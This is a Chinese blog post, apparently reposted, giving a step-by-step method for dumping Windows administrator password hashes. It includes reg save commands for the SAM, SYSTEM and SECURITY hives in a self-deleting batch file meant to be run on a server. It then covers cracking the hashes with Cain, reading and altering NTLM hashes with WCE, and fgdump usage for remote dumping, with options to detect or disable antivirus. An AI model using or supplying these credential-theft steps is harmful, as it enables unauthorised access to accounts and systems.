欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

抓取管理员hash值(哈希)的另类方法

程序员文章站 2022-06-15 22:55:49
哈希算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的... 12-05-11...
今天抓hash的时候发现gethashes.exe不好使..另外又测试了几个也都不好用...
不同版本的windows的hash获取方法不一样.
用到的工具有pwdump7.exe、gethashes.exe、saminside.exe、lc5、cain、proactive password auditor、ophcrack.
 于是百度了一些资料穿上来!希望大家能学习一下。
 ====================================第1种===========================================
 使用工具 cain、cmd、wce1.2等
 首先使用通用方法抓取hash
 使用命令先保存一份需要的信息。
 reg save hklm\sam sam.hive
 reg save hklm\system system.hive
 reg save hklm\security security.hive
 (这三个文件我找了个批处理,这样比较方便)
 ==========================
 @echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
 ===========================
 保存为批处理文件,直接在服务器上运行。
 就会在批处理所在目录生成这三个文件
 和下面的效果一样,只不过简化了步骤
抓取管理员hash值(哈希)的另类方法
然后我们使用cain打开保存到的system.hive 和security.hive两个文件。我是在虚拟机里面操作就直接在虚拟机里面搞了。。大家在服务器上搞可以下载到本地。
 打开cain选择lsa secrets然后打开system.hive 和security.hive两个文件
抓取管理员hash值(哈希)的另类方法
加载后我们可以看到一些信息,这些信息可能会有明文密码,我这里是没有的。
抓取管理员hash值(哈希)的另类方法
如果没有我们就需要抓hash了。点击cain的cracker选项卡,加载sam.hive文件。
抓取管理员hash值(哈希)的另类方法
抓取管理员hash值(哈希)的另类方法
拿到hash了,www.jb51.net 下面就是破解,用工具自带的破解试试密码出来了,我设置的123456
抓取管理员hash值(哈希)的另类方法
我们也可以使用彩虹表来破解
下面我们使用wce来搞。。这个工具是渗透利器哈~~具体介绍大家自己百度去。
抓取管理员hash值(哈希)的另类方法
从帮助来看我们可以使用-l参数查看ntml hash
 我们还可以用-s参数来改hash值如图
抓取管理员hash值(哈希)的另类方法
从图中我们可以看到最后一位的hash我从4修改到了5
抓取管理员hash值(哈希)的另类方法
====================================第2种===========================================
fgdump 可以远程抓hash的工具
 作者:thelostmind
一直都是本地抓,今天上saminside论坛看到一个开源的工具,fgdump,可以远程抓。
 http://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm
 fgdump 2.1.0 - fizzgig and the mighty group at foofus.net
written to make j0m0kun's life just a bit easier
copyright(c) 2008 fizzgig and foofus.net
fgdump comes with absolutely no warranty!
this is free software, and you are welcome to redistribute it
under certain conditions; see the copying and readme files for
more information.
usage:
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-o 32|64][-l logfile][-t threads] [{{-h host | -f filename} -u username -p password | -h filename}]
where username and password have administrator credentials
-? displays help (you're looking at it!)
-t will test for the presence of antivirus without actually running the password dumps
-c skips the cache dump
-w skips the password dump
-s performs the protected storage dump
-r forgets about existing pwdump/cachedump files. the default behavior is to skip a host if these files already exist.
-v makes output more verbose. use twice for greater effect
-k keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l logs all output to logfile
-t runs fgdump with the specified number of parallel threads
-h is the name of the single host to perform the dumps against
-f reads hosts from a line-separated file
-h reads host:username:password from a line-separated file (per-host credentials)
-o skips pwdump history dumps
-a will not attempt to detect or shut down antivirus, even if it is present
 -o manually sets whether the target is a 32- or 64-bit os. note that this applies to all hosts specified.
** as of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)
测试了一下,很不错,简单翻译了一下帮助。
 用法:
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-o 32|64][-l logfile][-t threads] [{{-h host | -f filename} -u
 username -p password | -h filename}]
 用户名和密码要求要有管理员资格
 -? 显示帮助
-t 测试当前的杀毒软件,并不是真正的转储密码
-c 跳过缓存转储
-w 跳过密码转储
-s 执行保护存贮转储
-r 忽略现存的pwdump/cachedump文件。默认的行为是跳过存在这些文件的主机。
-v 详细输出. 使用两次能获得更为详细的输出
-k 即使不知道杀毒软件的状态也继续执行pwdump/cachedump(进行密码转储)
-l 记录所有输出到日志文件
-t 使用指定数量的线程执行此程序
-h 需要执行密码转储的单个目标主机
-f 从用行分隔的文件中读取主机列表
-h 从用行分隔的文件中读取 主机名:用户名:密码
-o 跳过转储历史密码
-a 试图检测或关闭杀毒软件,即使杀毒软件正在运行
 -o 手工设置远程主机是32位操作系统还是64位操作系统。 注意:这项操作应用到所有指定的主机。
 ** 使用1.4.0,你可以直接运行此程序,不需要带参数,来转储本机密码